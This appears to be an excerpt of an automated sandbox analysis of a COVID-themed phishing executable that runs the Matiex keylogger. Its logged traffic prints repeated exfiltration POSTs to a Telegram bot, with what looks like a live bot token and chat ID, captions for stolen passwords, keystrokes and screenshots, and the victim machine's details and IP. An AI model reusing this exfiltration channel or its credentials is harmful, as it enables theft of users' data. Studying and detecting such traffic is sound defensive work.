Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768034a958a7Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768034fa6915Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768035208feaHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680354451e9Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803574006eHost: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768035c7735dHost: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768035e8d41dHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680360ef9e8Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803639e3a2Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803696e071Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768036b84068Host: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768036d9a244Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680372ab0eeHost: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680377bc16bHost: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768037d195adHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768037f2f67aHost: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768038204317Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680386ef809Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803892b5ceHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768038b1b319Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768038e62651Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803934d435Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680395634b8Host: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803975448cHost: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768039a2802dHost: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768039fd19a5Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803a1e7a3aHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803a3d78f2Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803aafe994Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803b9990bfHost: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803bbd536bHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803bdeb43dHost: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803c0e6344Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803c643a9fHost: api.telegram.orgContent-Length: 749
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.5:49783 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49777 -> 91.193.75.202:40401
Source: dwnl.exe, 00000021.00000002.500760473.0000000002F24000.00000004.00000001.sdmp String found in binary or memory: http://api.telegram.org
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: dwnl.exe, 00000021.00000002.499604994.0000000002D80000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: dwnl.exe, 00000021.00000002.499604994.0000000002D80000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: dwnl.exe, 00000021.00000002.499333644.0000000002D0B000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: dwnl.exe, 00000021.00000002.499364955.0000000002D1C000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.org/HB
Source: dwnl.exe, 00000021.00000002.499604994.0000000002D80000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.orgD8
Source: WerFault.exe, 00000022.00000003.464193186.000000000542E000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: dwnl.exe, 00000021.00000002.499649327.0000000002DA1000.00000004.00000001.sdmp String found in binary or memory: http://freegeoip.app
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: dwnl.exe, 00000021.00000003.484320135.00000000088B1000.00000004.00000001.sdmp String found in binary or memory: http://ns.adb
Source: dwnl.exe, 00000021.00000002.505061578.00000000088C0000.00000004.00000001.sdmp String found in binary or memory: http://ns.ado/1k
Source: dwnl.exe, 00000021.00000002.505061578.00000000088C0000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.c/gk
Source: dwnl.exe, 00000021.00000002.505061578.00000000088C0000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cobjk
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://ocsp.digicert.com0K
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: dwnl.exe, 00000021.00000002.499484272.0000000002D3A000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
